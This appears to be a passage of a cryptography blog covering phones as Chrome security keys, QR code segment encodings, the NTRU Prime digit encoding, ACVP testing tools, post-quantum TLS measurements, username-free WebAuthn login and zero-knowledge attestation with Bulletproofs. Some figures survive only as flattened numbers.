As an aside, it's interesting to wonder how many CPU decades have been spent fuzzing OpenSSL's certificate parsing and yet today's issue wasn't reported before. This isn't a 2-128 fraction of state space that fuzzers couldn't be expected to find, and I'm not sure that Tavis found it from fuzzing at all.

Phones as security keys in Chrome

With Chrome 94, if you have an Android phone with Chrome on it, and it’s syncing to the same Google account as Chrome on a Chrome OS/Windows/macOS device, then you’ll be able to use that phone as a security key. You should be able to try this out on any WebAuthn using website, for example here. (But not accounts.google.com, which uses a different system.)

The reason that you are reading about this here and not on an official Google site is that people shouldn’t start registering their phone as a security key unless they have a physical security key as a back up. Just like a regular security key, if you lose the phone then you lose the credentials. So, just like a regular security key, you should have a back up. (You can also lose your credentials if you remove the screen lock, or somehow wipeout Play Services state — e.g. by doing a factory reset.)

We have plans for addressing this and making this suitable for regular people, and to allow use in other profiles, but we’re not there yet. We are interested in whether the communications infrastructure is good enough though. (More below.)

For signing into Google, it has long been possible to use your phone as a security key. This only worked in Chrome and functioned over BLE GATT between the desktop and phone. We have wanted to expand this to the web in general for years, but the success rate that we measured with BLE was poor. After quite a lot of work trying to improve the BLE success rate, we didn’t achieve much.

But the use of BLE is more than just a convenience. The security model demands some proof of physical proximity between the authenticator and the machine that is being authenticated. For a USB security key the authenticator will only respond to something that is making physical contact with it. So when a phone is acting as a security key it needs to prove that the machine it is talking to is physically close by. (Or at least that the attacker is in control of a BLE radio that is physically close.)

We looked at other Bluetooth modes in the hopes that they might work better, but classic Bluetooth RFCOMM isn’t supported on iOS and requires a lot of user interaction on android. BLE L2CAP is supported on iOS, but isn’t supported (in user space) on Windows. It’s also flaky in the face of MAC address rotation if the devices aren’t paired.

So where we’ve ended up is that all the communication happens over the internet connection, but the phone sends a nonce in a BLE advert and the other end of the channel has to prove receipt. That’s the least amount of Bluetooth we could use while still requiring physical proximity. Needing bilateral internet connectivity is unfortunate though. So you can also connect the phone with a USB cable while the security key operation is running. (But very sadly not on Windows; The USB stack there just isn’t designed in the right way for it.) We might also add L2CAP as an option in the future.

This isn’t enabled on Linux at the moment. Historically trying to do the BLE GATT connection would often fail with bluez, and so the phone as a security key infrastructure was disabled on Linux. Now that the desktop only needs to receive a BLE advert it looks like it could work, but we haven’t flipped that switch yet.

As I mentioned above, we are interested in whether the underlying infrastructure is plausible. Aggregated anonymous statistics are useful for many things but in this case they suggest that BLE isn’t always working as well as it should, but don’t tell us why not. So if you are especially keen about security keys and want to try this out, I’d be interested in your experiences. I can't promise to respond but I will read everything if you send me an email (agl at chromium dot org) or tweet at me (agl__).

Some troubleshooting hints if you're having issues because this will be much faster than asking me!

If no phones appear as options: you're using Windows, macOS, or Chrome OS, yes? And it's an Android phone? And the machine has working Bluetooth? And Chrome is up to date everywhere? If you navigate to chrome://sync-internals, is the “Transport state” at the top-left reporting “Active”? If not, enable Sync. On the phone, does Settings say that Sync is on at the top? If not, enable it. Is the account listed in Settings on the phone the same as the “Username” in chrome://sync-internals on the desktop? If all that's good then probably you just need to wait because it can take a couple of days for the registration to propagate. Probably in the “Device Info” section of the “Sync Node Browser” in chrome://sync-internals your phone is listed, but there's no paask_fields section yet. If you want to short-circuit that, you can install Chrome Canary on the phone and enable syncing there. That should register quite quickly.

You can select the phone on the desktop, but nothing happens: the phone should be getting a cloud message poke that triggers a notification. Does the phone have internet access? Did you completely disable notifications from Chrome? `adb logcat | grep -i cable` would be interesting if you're setup for that. Otherwise, if this is a common issue, I might have to add some logging and ask for the tunnel URL from chrome://device-log.

You get the notification and tap it, but something else goes wrong: if an error code or error message is displayed then I want to know what it is! If it's hanging then the message at the bottom of the screen changes for each step of the process so that's what'll be useful. Most problems seem to be BLE: is the phone close to the desktop? What other BLE is happening on the devices?

Efficient QR codes

QR codes seem to have won the battle for 2D barcodes, but they're not just a bag of bits inside. Their payload is a series of segments, each of which can have a different encoding. Segments are bitstrings, concatenated without any byte-alignment, and terminated with an empty segment of type zero. If you want to squeeze the maximum amount of data into a QR code without it turning into a gray square, understanding segmentation helps.

The most basic segment type is byte mode, which is a series of 8-bit bytes. If you control the QR decoder then this is perfectly efficient for encoding binary data. But you probably need to work with a variety of decoders. In that case, beware: the first edition of the QR standard, ISO/IEC 18004, said that byte mode should be interpreted as JIS X 0201. The 2005 edition changed that to be ISO/IEC 8859-1 (i.e. Latin-1). In practice, some QR decoders will attempt to content-sniff the encoding because, while UTF-8 contents should be indicated with an ECI header, they often aren't and UTF-8 is really common.

So if you put binary data into a QR code, you are probably going to hit these edge cases. The contents are likely going to be passed to a general operating system API for handling URLs — do you think the full pipeline will handle NUL bytes in the string, and UTF-8 non-characters and invalid surrogate pairs when interpreted as UTF-8? Also, you probably want your QR contents to be a printable string: bits of it might be shown in the scanner's UI; users might need to copy and paste them.

So let's assume that you want something printable and consider an obvious answer: base64url. It's very common, printable, and doesn't contain any characters that are special in URLs for maximum compatibility. It'll be encoded in a byte-mode segment: each base64url character contains 6 bits of information and takes 8 bits in the QR code for an efficiency of 75%. That's our baseline.

The next segment type to consider is digit mode. This only encodes the digits, 0–9, by packing triples of digits into 10 bits. If there are two digits left over at the end then they take 7 bits, and a singleton takes 4 bits. Ignoring the potential digits at the end, this lets you store 3×log2(10) = 3×3.322 = 9.966 bits of information in 10 bits of space. That's 99.66% efficient! So you can clearly do better than base64url.

The last segment type for these purposes is alphanumeric mode. These segments can encode A–Z, 0–9, and nine special characters: $, %, *, +, -, ., /, :, and space. Pairs of these characters are encoded in 11 bits. (If there's an odd number then the last takes 6 bits.) If you consider this to be “base-45” encoding then it stores 2×log2(45) = 10.98 bits in 11 bits of space, for 99.85% efficiency. Even better than digit mode, although only just.

So maybe you should base-45 encode your data using that alphabet. But, of the special characters supported in alphanumeric mode, only two (minus and period) are unreserved (i.e. safe) in URLs. So you might be reduced to base-38, which cuts the efficiency to 95.42%. But having textually smaller QR contents might be valuable and worth a few percent efficiency in your context.

If you've picked base-10 (digits), base-38, or even base-45 for your data then you need to get it into that form. Base-64 is easy because that's exactly 6 bits per character; you work on 3 bytes of input at a time and produce exactly 4 characters of output. But 10, 38, and 45 aren't powers of two. You've got three options here. The obvious conversion would be to treat the input as a bigint and repeatedly divmod by 10 (or 38, etc) to generate the encoding. If you have a bigint library to hand then it almost certainly has the functions for that, but it's a rather obnoxious (and quadratic) amount of computation and a significant dependency. So you might be willing to waste a few bits to make things easier.

Next option is an encoding noted by djb that achieves similar efficiency but with less computation and no long-division. I updated this post to include it, so it's covered in a section below.

The third option is to chunk the input and convert each chunk independently. Ideal input chunks would be 8 bytes or fewer, because nearly all environments will support a uint64 type and nearly all hardware can do a divmod on them. If you're using base-10 then there's going to be a function that can “print” a uint64 to digits for you, so let's take digits as an example. With a chunk size of two bytes you would get five digits. Each digit takes 3⅓ bits of space, so 16 input bits takes 16⅔ bits: 96% efficient. Less than the 99.66% we can get with digits for sure. But if you consider all chunk sizes from one to eight bytes, turning 7-byte chunks into 17 digits is 98.82% efficient. That's pretty good for the complexity savings.

For base-38, 7-byte chunks are the best again, producing 11 characters for 92.56% efficiency. For base-45, two-byte chunks produce 3 characters for 96.97% efficiency. (Four- and eight-byte chunks do the same if you want fewer loop iterations.)

(And you should use little-endian chunks because little-endian has won, even if the IETF hasn't caught up to that yet.)

Now you've got your payload encoding sorted … probably. A wrinkle is that it's difficult to know how your QR encoder will segment what you give it. You might have crafted a wonderful base-38 input and it might stuff it all into a byte-mode segment! (68.65% efficient, worse than base64url.) I'm sadly not aware of a good QR “debugger” that shows all the details of a QR code. ZXing's online service will give a hex-dump of the raw contents, but that assumes that you can decode the segment headers. (QR-Logo promises better debugging output but doesn't work for me.) My best advice is to use ZXing on a sample QR code, ignore the 0xec, 0x11 padding pattern at the end, and calculate whether the number of bytes used roughly makes sense.

You probably want to put a URL-like prefix at the front to make your QR codes distinguishable. One thing to consider is that “https://www.example.com/” is a byte-mode segment that takes 204 bits, but “HTTPS://WWW.EXAMPLE.COM/” is alphanumeric and needs only 145 bits. (That's assuming QR versions 1 through 9, the lengths are slightly different otherwise.) DNS names are case insensitive and “an implementation should accept uppercase letters” for the scheme says RFC 3986. Maybe it just looks odd and that's not worth the bits, though?

We'll finish up with a quick look at an example, which is the thing that started me on this path in the first place: SMART Health Cards. (Thank you to the person who pointed me at them, who likely wants to remain anonymous.)

SHC's are trying to squeeze a lot of data into a QR code: they minify their JSON structure and compress it but, even then, they sometimes span multiple QR codes and the user has to scan them all. As such their contents are a) a binary segment containing “shc:/” (and maybe sequence numbers if using multiple QR codes), and then b) a digits segment containing the payload. So they didn't use “SHC:/” to save bits, but the difference is small.

One thing to note is that the QR spec (ISO/IEC 18004:2005) has a whole section on “structured append” mode, where multiple QR codes can be combined into one. But trying that with iOS and Android shows that neither support it, so probably it can be considered dead and that's why SHC is replicating the same feature at a higher level.

Another thing to note is that SHC is using digits for better efficiency, which is great, but the way that they do it is not. They're using JWT, which is bad but not today's topic, so they have three base64-encoded strings. They then take each base64 character, subtract 45, and turn that into two base-10 digits! All that work minifying JSON and compressing it, and then they throw away 10% of their bits on such a trivial thing!

So SHC did pretty well, but missed an easy win. Having read this, you can do better.

The NTRU Prime encoding

Above, I referenced an encoding that gets nearly all the space efficiency of the bigint-and-divmod method, but without the computational costs. This section is about that. It's taken from page 18 of the NTRU Prime NIST submission.

Our motivating issue is thus: if you have a whole byte then taking it mod 10 to generate a digit works fairly well. The digits 0–5 have probability 26/256 while 6–9 have probability 25/256. That's not uniform therefore it doesn't encode the maximum amount of entropy, but it's 99.992% efficient, which is pretty good. But when you have a smaller range of input values the non-uniformity becomes significant and so does the reduction in information transmitted.

The encoding in NTRU Prime takes input values (which can be larger than bytes) and combines pairs of them. It produces some output values from each pair but, once the non-uniformity gets unconfortable, it pairs up the leftovers to increase the range. This repeats in a binary-tree.

As a concrete example we'll use the Python code from page 18 and set M = [256…] (because our inputs are bytes), change the 256 and 255 to 10 and 9 (to extract digits, not bytes), and set limit to 1024. Our example input will be 419dd0ed371f44b7.

I 65 157 208 237 55 31 68 183 40257→7,5 60880→0,8 7991→1,9 46916→6,1 402/656 608/656 79/656 469/656 399250→0,5,2 307743→3,4,7 399/431 185761→6,1,7 →2,3,1 307/431 132/186

The input bytes are written (in base 10) along the top. Pairs of them are combined. Take the top-right box: its value is 157×256 + 65 = 40257. That can be considered to be 40257 mod 65536 and, since there's a reasonable number of bits in there, two digits are extracted. Obviously 40257 mod 10 = 7, and 4025 mod 10 = 5. So the two digits are 7 and 5. That leaves 402 mod 656, and 656 is below the limit of 1024 that we set, so it's passed down to be combined into the box below. This continues down the tree: each time there's too little data left to extract another digit, the leftovers are passed down to be combinined. At the bottom there's nothing else to combine with so the final leftover value, 132 mod 186, is converted into the digits 2, 3, and 1. The ultimate output digits are concatenated from left-to-right, top-to-bottom.

This achieves good encoding efficiency without repeated long-division, and can be parallelised.

ACVP

If you do not know what ACVP is then you should read no further. If you think it might be useful then what you're actually looking for is Wycheproof; ACVP is only for those who have no choice.

If you're still reading and you're vaguely aware that your previous CAVP infrastructure isn't applicable any longer, and that you'll need to deal with ACVP next time, then you might be interested in BoringSSL's ACVP infrastructure. We have a number of different FIPS modules to test and wanted something generic rather than repeating the bespoke-per-module way that we handled CAVP. We also need to test not just BoringCrypto (a software module) but also embedded devices.

The result, acvptool, lives within the BoringSSL repo and can translate ACVP JSON into a series of reasonably simple IPC calls that a “module wrapper” speaks over stdin/stdout. BoringSSL's module wrapper is the reference implementation, but there's also a tiny one for testing that could easily be repurposed to forward over a serial link, etc, for embedded devices.

It's reasonably likely that you'll find some case that's not handled, but the code is just Go throwing around JSON so you should be able to extend it without too much bother. But, for the cases that are already handled, the weird undocumented quirks that'll otherwise consume hours of your life are taken care of.

Letter to 20 years ago

I noticed that I have not posted anything here in 2020! There's a bunch of reasons for this: the work I'm doing at the moment does not lend itself so well to blog posts, and life intervenes, leaving less time for personal projects. But in order to head off the risk that I'll post nothing at all this year I pulled something from one of my notebooks. 2020 is a round number so I decided to do some reflection and this was a letter that I imagined writing to myself 20 years ago. It is very much a letter to me! The topics are going to be quite specific and if you weren't paying attention to the computing industry in the year 2000 I’m not sure how much of it will make sense. But these are the points that I think me of 20 years ago would have wondered about.

You must be thinking that computers will be crazy fast by now. Yes…ish. It's complicated, and that's going to be a theme here. You've been hearing from Intel that the NetBurst chips will hit 10GHz in a few years, so with another few doublings what will have by now? 50GHz? Actually common values are around 3.5GHz. Some reach 5GHz, but only in bursts. Intel never hit 10GHz and nor did anybody else. It’s better than it sounds: instructions per clock are up a lot, so each cycle is worth more. (Although maybe we'll get to some of the issues that caused!) More importantly, all systems are multiprocessor now. It's physically a single chip, but inside is often 8- to 32-way SMT. Yep, that's cool. And yep, it only helps for certain sorts of workloads. Multithreaded programming is not going away.

Memory? 10s of gigabytes is common. Hard drives? It's nearly all flash now. You can still buy hard drives and they’re huge and cheap, but the speed of flash is pretty sweet. Computers really are quite substantially faster — don't be too put off by the clock speeds.

Your day-to-day life is a bunch of xterms and a web browser. Nothing's changed; you are dramatically underestimating the importance of path dependence. Terminals are still emulating a fancy VT-100 and sometimes they get messed up and need a reset. No fixes there. It's still bash or zsh; nearly unchanged from your time. The kernel has been fixed a little: you can now get a handle to a process, so no more PID races. You can open a file relative to a directory descriptor and you can create an unlinked file in a directory and link it later. Yes it's good that these things are possible now, but it is not a fundamental change and it took a long time. Actually you know what? Windows grew a much smarter shell, leapfrogging Linux in several respects. They had hardly moved forward since DOS so it was easier there, perversely.

So innovation must have happened higher up where there was new ground and little legacy, right? What about the semantic web? How did that turn out? Not well. We don't have lots of data in machine-readable formats and fancy GUIs so that anyone can create automation. Information is somewhere between impossible and a huge pain to access. You’ve read The Dilbert Future by now and its ‘confusopoly’ concept is much closer to the mark. The Semantic Web stuff failed so badly that nobody even tries any longer. (I'm afraid Scott Adams won’t seem so wholesome in the future either.) The closest you'll get is that your web browser can fill out your name, address, and credit card details. And it has to work really hard to do that because there’s almost no assistance from web pages. Go find Weaving the Web and throw it away.

Something more positive: bandwidth! You are using a dial-up that tops out at 5 KB/s and charges by the minute. You use a local proxy that keeps a copy of everything so that viewed pages are available offline and it lets you mark missing pages for batch fetching to reduce the cost. This problem is now solved. You can assume that any house in a city can get an always-on, several 10s of Mb/s connection. It's not as cheap as it could be but it's a standard household expense now. (Note: past me doesn't live in the US! —agl.) Also, everyone carries an impossibly fancy PDA that has that level of connection wirelessly and everywhere. I don't need to equivocate here, connectivity is solved in the sorts of places you're likely to live. But … there's a second edge to that sword. This connectivity can be a bit … much? There are some advantages to having the internet be stationary, metered, and behind 30 seconds of banshee wailing and static. Imagine your whole social life getting run through IRC, and that you're always connected. It’s tough to explain but there's a problem. But these PDAs? They have GPS and maps. Nobody gets lost anymore. Nobody carries paper street maps in their car. Connectivity can be pretty sweet.

This next bit is going to upset you a little: the whole Palladium / trusted boot stuff never took off on the desktop, but these PDAs are pretty locked down. One type of them is completely locked down and you can’t run non-approved software. The other will make you jump through hoops and, even then, you can't access the data of other programs. On the latter sort you can install a completely custom OS most of the time, but there's attestation and some things won't cooperate. This is still playing out and people are fighting over the details (because of money, of course). It remains a concern, but you underestimate the benefits of this sort of system. Your idea that people should own their own computers because they’re critical tools isn't wrong, but it is elitist. For the vast majority of people, their desktops degrade into a fragile truce with a whole ecosystem of malware and near-malware. Maybe it's their “fault” for having installed it, but these PDAs are so popular, in part, because they're hard to screw up. Bad stuff does get through the approval process, but it cannot mess things up to the wipe-and-reinstall level that desktops reach. The jury is still out about whether we will regret this, but you're wrong about the viability of giving people Windows XP and getting a good result.

Back on a positive note: the music industry switched to a $15 a month stream-whatever-you-want model and it works fine. You were completely right about this. Music still exists and it still pays a few at the top large sums and the rest very little. The music industry itself didn't sort this out though, other companies did it for them. What you're missing is that you’re not taking things far enough: companies also did this for TV and (many) movies. There are still rips of this stuff on BitTorrent, but it's not a live issue because people pay the subscription for the ease, by and large. In fact, access to scientific papers is a hotter issue now!

Basically, rates of change are really uneven.

Real-world measurements of structured-lattices and supersingular isogenies in TLS

This is the third in a series of posts about running experiments on post-quantum confidentiality in TLS. The first detailed experiments that measured the estimated network overhead of three families of post-quantum key exchanges. The second detailed the choices behind a specific structured-lattice scheme. This one gives details of a full, end-to-end measurement of that scheme and a supersingular isogeny scheme, SIKE/p434. This was done in collaboration with Cloudflare, who integrated Microsoft's SIKE code into BoringSSL for the tests, and ran the server-side of the experiment.

Setup

Google Chrome installs, on Dev and Canary channels, and on all platforms except iOS, were randomly assigned to one of three groups: control (30%), CECPQ2 (30%), or CECPQ2b (30%). (A random ten percent of installs did not take part in the experiment so the numbers only add up to 90.) CECPQ2 is the hybrid X25519+structured-lattice scheme previously described. CECPQ2b is the name that we gave to the combination of X25519 and the SIKE/p434 scheme.

Because optimised assembly implementations are labour-intensive to write, they were only available/written for AArch64 and x86-64. Because SIKE is computationally expensive, it wasn’t feasible to enable it without an assembly implementation, thus only AArch64 and x86-64 clients were included in the experiment and ARMv7 and x86 clients did not contribute to the results even if they were assigned to one of the experiment groups.

Cloudflare servers were updated to include support for both CECPQ2 and CECPQ2b, and to support an empty TLS extension that indicated that they were part of the experiment. Depending on the experiment group, Chrome would either offer CECPQ2, CECPQ2b, or just non-post-quantum options, in its TLS 1.3 handshake, along with the signaling extension to indicate which clients were part of the control group. Measurements were taken of how long TLS handshakes took to complete using Chrome’s metrics system. Chrome knew which servers were part of the experiment because they echoed the signaling extension, thus all three groups were measuring handshake duration against the same set of servers.

After this phase of the trial was complete, client-side measurements were disabled and Chrome Canary was switched to a mode where it randomly picked one of CECPQ2, CECPQ2b, or neither to offer. This enabled some additional, server-side measurements to ensure that nothing unexpected was occuring.

(Cloudflare has a significantly more detailed write up of this experiment.)

Biases

We’re aware of a couple of biases and these need to be kept in mind when looking at the results. Firstly, since ARMv7 and x86 platforms were excluded, the population was significantly biased towards more powerful CPUs. This will make supersingular isogenies look better. Also, we’ve seen from past experiments that Canary and Dev Chrome users tend to have worse networks than the Chrome user population as a whole, and this too will tend to advantage supersingular isogenies since they require less network traffic.

Results

Here are histograms of client-side results, first from Windows (representing desktops/laptops) and from Android (representing mobile devices):

1 10 100 1000 10000 TLS handshake time (ms) TLS handshake latency (Windows) Control Control CECPQ2 CECPQ2 CECPQ2b CECPQ2b 1 10 100 1000 10000 TLS handshake time (ms) TLS handshake latency (Android) Control Control CECPQ2 CECPQ2 CECPQ2b CECPQ2b

From the histograms we can see that the CECPQ2b (SIKE) group shifts visibly to the right (i.e. slower) in both cases. (On Android, a similar but smaller shift is seen for CECPQ2.) Despite the advantages of removing the slower clients and experimenting with worse-than-usual networks, the computational demands of SIKE out-weigh the reduced network traffic. Only for the slowest 5% of connections are the smaller messages of SIKE a net advantage.

Cloudflare have a much more detailed analysis of the server-side results, which are very similar.

Conclusion

While there may be cases where the smaller messages of SIKE are a decisive advantage, that doesn’t appear to be the case for TLS, where the computational advantages of structured lattices make them a more attractive choice for post-quantum confidentiality.

Username (and password) free login with security keys

Most readers of this blog will be familiar with the traditional security key user experience: you register a token with a site then, when logging in, you enter a username and password as normal but are also required to press a security key in order for it to sign a challenge from the website. This is an effective defense against phishing, phone number takeover, etc. But modern security keys are capable of serving the roles of username and password too, so the user experience can just involve clicking a login button, pressing the security key, and (perhaps) entering a locally-validated PIN if the security key doesn't do biometrics. This is possible with the recently released Chromium 76 and also with Edge or Firefox on current versions of Windows.

On the plus side, this one-button flow frees users from having to remember and type their username and password for a given site. It also avoids sites having to receive and validate a password, potentially avoiding both having a password database (which, even with aggressively slow hashes, will leak many users' passwords if disclosed), and removing any possibility of accidentally logging the plaintext values (which both Google and Facebook have done recently). On the negative side, users will need a modern security key (or Windows Hello-enabled computer) and may still need to enter a PIN.

Which security keys count as “modern”? For most people it'll mean a series-5 black Yubikey or else a blue Yubikey that has a faint “2” printed on the upper side. Of course, there are other manufacturers who make security keys and, if it advertises “CTAP2” support, there's a good chance that it'll work too. But those Yubikeys certainly do.

In practical terms, web sites exercise this capability via WebAuthn, the same API that handles the traditional security key flow. (I'm not going to go into much detail about how to use WebAuthn. Readers wanting more introductory information can see what I've written previously or else see one of the several tutorials that come up in a Google search.)

When registering a security key for a username-free login, the important differences are that you need to make requireResidentKey true, set userVerification to required, and set a meaningful user ID.

In WebAuthn terms, a “resident” credential is one that can be discovered without knowing its ID. Generally, most security keys operate statelessly, i.e. the credential ID is an encrypted private seed, and the security key doesn't store any per-credential information itself. Thus the credential ID is required for the security key to function so the server sends a list of them to the browser during login, implying that the server already knows which user is logging in. Resident keys, on the other hand, require some state to be kept by the security key because they can be used without presenting their ID first. (Note that, while resident keys require some state to be kept, security keys are free to keep state for non-resident keys too: resident vs non-resident is all about whether the credential ID is needed.)

User verification is about whether the security key is providing one or two authentication factors. With the traditional experience, the security key is something you have and the password is something you know. In order to get rid of the password, the security key now needs to provide two factors all by itself. It's still something you have so the second security key factor becomes a PIN (something you know) or a biometric (something you are). That begs the question: what's the difference between a PIN and a password? On the surface: nothing. A security key PIN is an arbitrary string, not limited to numbers. (I think it was probably considered too embarrassing to call it a password since FIDO's slogan is “solving the world's password problem”.) So you should think of it as a password, but it is a password with some deeper advantages: firstly, it doesn't get sent to web sites, so they can't leak it and people can safely use a single password everywhere. Secondly, brute-force resistance is enforced by the hardware of the security key, which will only allow eight attempts before locking and requiring a reset. Still, it'll be nice when biometrics are common in security keys.

A user ID is an opaque identifier that should not be personally identifying. Most systems will have some database primary key that identifies a user and, if using that as a WebAuthn user ID, ensure that you encrypt it first with a key that is only used for this purpose. That way it doesn't matter if those primary keys surface elsewhere too. Security keys will only store a single credential for a given pair of domain name and user ID. So, if you register a second credential with the same user ID on the same domain, it'll overwrite the first.

The fact that you can register more than one credential for a given domain means that it's important to set the metadata correctly when creating a resident credential. This isn't unique to resident keys, but it's much more important in this context. The user name and displayName will be shown by the browser during login when there's more than one credential for a domain. Also the relying party name and displayName will be shown in interfaces for managing the contents of a security key.

When logging in, WebAuthn works as normal except you leave the list of credential IDs empty and set userVerification to required. That triggers the resident-credential flow and the resulting credential will include the user ID, with which you look up the user and their set of registered public keys, and then validate the public key and other parameters.

Microsoft have a good test site (enter any username) where you can experiment with crafting different WebAuthn requests.

Exposed credentials

In order to support the above, security keys obviously have a command that says “what credentials do you have for domain x?”. But what level of authentication is needed to run that command is a little complex. While it doesn't matter for the web, one might want to use security keys to act as, for example, door access badges; especially over NFC. In that case one probably doesn't want to bother with a PIN etc. Thus the pertinent resident credentials would have to be discoverable and exercisable given only physical presence. But in a web context, perhaps you don't want your security key to indicate that it has a credential stored for cia.gov (or mss.gov.cn) to anyone who can plug it in. Current security keys, however, will disclose whether they have a resident credential for a given domain, and the user ID and public key for that credential, to anyone with physical access. (Which is one reason why user IDs should not be identifying.) Future security keys will have a concept of a per-credential protection level which will prevent them from being disclosed without user verification (i.e. PIN or biometrics), or without knowing their random credential ID. While Chromium will configure credential protection automatically if supported, other browsers may not. Thus it doesn't hurt to set credProtect: 2 in the extensions dictionary during registration.

Zero-knowledge attestation

U2F/FIDO tokens (a.k.a. “Security Keys”) are a solid contender for doing something about the effectiveness of phishing and so I believe they're pretty important. I've written a fairly lengthy introduction to them previously and, as mentioned there, one concerning aspect of their design is that they permit attestation: when registering a key it's possible for a site to learn a cryptographically authenticated make, model, and batch. As a browser vendor who has dealt with User-Agent sniffing, and as a large-site operator, who has dealt with certificate pervasiveness issues, that's quite concerning for public sites.

It's already the case that one significant financial site has enforced a single-vendor policy using attestation (i.e. you can only register a token made by that vendor). That does not feel very congruent with the web, where any implementation that follows the standards is supposed to be a first-class citizen. (Sure, we may have undermined that with staggering levels of complexity, but that doesn't discredit the worth of the goal itself.)

Even in cases where a site's intended policy is more reasonable (say, they want to permit all tokens with some baseline competence), there are strong grounds for suspecting that things won't turn out well. Firstly, the policies of any two sites may not completely align, leading to a crappy user experience where a user needs multiple tokens to cover all the sites that they use, and also has to remember which works where. Secondly, sites have historically not been so hot about staying up-to-date. New token vendors may find themselves excluded from the market because it's not feasible to get every site to update their attestation whitelists. That feels similar to past issues with User-Agent headers but the solution there was to spoof other browsers. Since attestation involves a cryptographic signature, that answer doesn't work here.

So the strong recommendation for public sites is not to request attestation and not to worry about it. The user, after all, has control of the browser once logged in, so it's not terribly clear what threats it would address.

However, if we assume that certain classes of sites probably are going to use attestation, then users have a collective interest in those sites enforcing the same, transparent standard, and in them keeping their attestation metadata current. But without any impetus towards those ends, that's not going to happen. Which begs the question: can browsers do something about that?

Ultimately, in such a world, sites only operate on a single bit of information about any registration: was this public-key generated in a certified device or not? The FIDO Alliance wants to run the certification process, so then the problem reduces down to providing that bit to the site. Maybe they would simply trust the browser to send it: the browser could keep a current copy of the attestation metadata and tell the site whether the device is certified or not. I don't present that as a straw-man: if the site's aim is just to ensure that the vast majority of users aren't using some backdoored token that came out of a box of breakfast cereal then it might work, and it's certainly simple for the site.

But that would be a short blog post, and I suspect that trusting the browser probably wouldn't fly in some cases.

So what we're looking for is something like a group signature scheme, but we can't change existing tokens. So we need to retrospectively impose a group signature on top of signers that are using vanilla P-256 ECDSA.

Zero-knowledge proofs

It is a surprising but true result in cryptography that it's possible to create a convincing proof of any statement in NP that discloses nothing except the truth of the statement. As an example of such a statement, we might consider “I know a valid signature of message x from one of the public keys in this set”. That's a pretty dense couple of sentences but rather than write an introduction to zero-knowledge proofs here, I'm going to refer you to Matthew Green's posts[1][2]. He does a better job than I would.

I obviously didn't pick that example at random. If there was a well-known set of acceptable public keys (say, as approved by the FIDO Alliance) then a browser could produce a zero-knowledge proof that it knew a valid attestation signature from one of those keys, without disclosing anything else, notably without disclosing which public key was used. That could serve as an “attestation valid” bit, as hypothesised above, that doesn't require trusting the browser.

As a concrete instantiation of zero-knowledge proofs for this task, I'll be using Bulletproofs [BBBPWM17]. (See zkp.science for a good collection of many different ZK systems. Also, dalek-cryptography have excellent notes on Bulletproofs; Cathie Yun and Henry de Valence from that group were kind enough to help me with a question about Bulletproofs too.)

The computational model for Bulletproofs is an arithmetic circuit: an acyclic graph where public and secret inputs enter and each node either adds or multiplies all its inputs. Augmenting that are linear constraints on the nodes of the circuit. In the tool that I wrote for generating these circuits, this is represented as a series of equations where the only operations are multiplication, addition, and subtraction. Here are some primitives that hopefully convince you that non-trivial functions can be built from this:

PP-256

Using single bit values in an arithmetic circuit certainly works, but it's inefficient. Getting past single-bit values, the arithmetic circuits in Bulletproofs don't work in ℤ (i.e. arbitrary-length integers), rather they work over a finite field. Bulletproofs are built on top of an elliptic curve and the finite field of the arithmetic circuit is the scalar field of that curve.

When dealing with elliptic curves (as used in cryptography) there are two finite fields in play: the x and y coordinates of the points on the curve are in the coordinate field of the curve. Multiples of the base point (B) then generate a prime number (n) of points in the group before cycling back to the base point. So xB + yB = (x + y mod n)B — i.e. you can reduce the multiple mod n before multiplying because it'll give the same result. Since n is prime, reduction mod n gives a field, the scalar field.

(I'm omitting powers of primes, cofactors, and some other complications in the above, but it'll serve.)

So Bulletproofs work in the scalar field of whatever elliptic curve they're implemented with, but we want to build P-256 ECDSA verification inside of a Bulletproof, and that involves lots of operations in P-256's coordinate field. So, ideally, the Bulletproofs need to work on a curve whose scalar field is equal to P-256's coordinate field. Usually when generating a curve, one picks the coordinate field to be computationally convenient, iterates other parameters until the curve meets standard security properties, and the scalar field is whatever it ends up as. However, after some quality time with “Constructing elliptic curves of prime order” (Broker & Stevenhagen) and Sage, we find that y² = x³ - 3x + B over GF(PP) where:

… gives a curve with the correct number of points, and which seems plausibly secure based on the SafeCurves criteria. (A more exhaustive check would be needed before using it for real, but it'll do for a holiday exploration.) Given its relationship to P-256, I called it “PP-256” in the code.

ECDSA verification

Reviewing the ECDSA verification algorithm, the public keys and message hash are obviously public inputs. The r and s values that make up the signature cannot be both be public because then the verifier could just try each public key and find which one generated the signature. However, one of r and s can be public. From the generation algorithm, r is the x-coordinate of a random point and s is blinded by the inverse of the nonce. So on their own, neither r nor s disclose any information and so can just be given to the verifier—moving work outside of the expensive zero-knowledge proof. (I'm not worrying about tokens trying to use a covert channel here but, if you do worry about that, see True2F.)

If we disclose s to the verifier directly then what's left inside the zero-knowledge proof is 1) selecting the public key; 2) checking that the secret r is in range; 3) u₂ = r/s mod n; 4) scalar-multiplication of the public key by u₂; 5) adding in the (now) public multiple of the base point; and 6) showing that the x-coordinate of resulting point equals the original r, mod n.

The public-key is a 4-tooth comb, which is a precomputed form that speeds up scalar multiplications. It consists of 30 values. The main measure that we want to minimise in the arithmetic circuit is the number of multiplications where both inputs are secret. When selecting from t possible public keys the prover supplies a secret t-bit vector where only one of the bits is set. The proof shows that each value is, indeed, either zero or one using IsBit (from above, at a cost of one multiply per bit), and that exactly one bit is set by requiring that the sum of the values equals one. Each of the 30t public-key values is multiplied by one of the bits and summed to select exactly one key.

Rather than checking that the secret r is within [0, n-1], which would cost 512 multiplies, we just check that it's not equal to zero mod n. That's the important condition here since an out of range r is otherwise just an encoding error. Showing that a number is not zero mod n just involves showing that it's not equal to zero or n, as 2n is outside of the arithmetic circuit field. Proving a ≠ b is easy: the prover just provides an inverse for a - b (since zero doesn't have an inverse) and the proof shows that (a - b) × (a - b)⁻¹ = 1.

Calculating r/s mod n is the most complex part of the whole proof! Since the arithmetic circuit is working mod P-256's p, working mod n (which is the order of P-256—slightly less than p) is awkward. The prover gives bit-wise breakdown of r; the proof does the multiplication as three words of 86, 86, and 84 bits; the prover supplies the values for the carry-chain (since bit-shifts aren't a native operation in the arithmetic circuit); the prover then gives the result in the form a×n + b, where b is a 256-bit number; and the proof does another multiplication and carry-chain to check that the results are equal. All for a total cost of 2152 multiplication nodes!

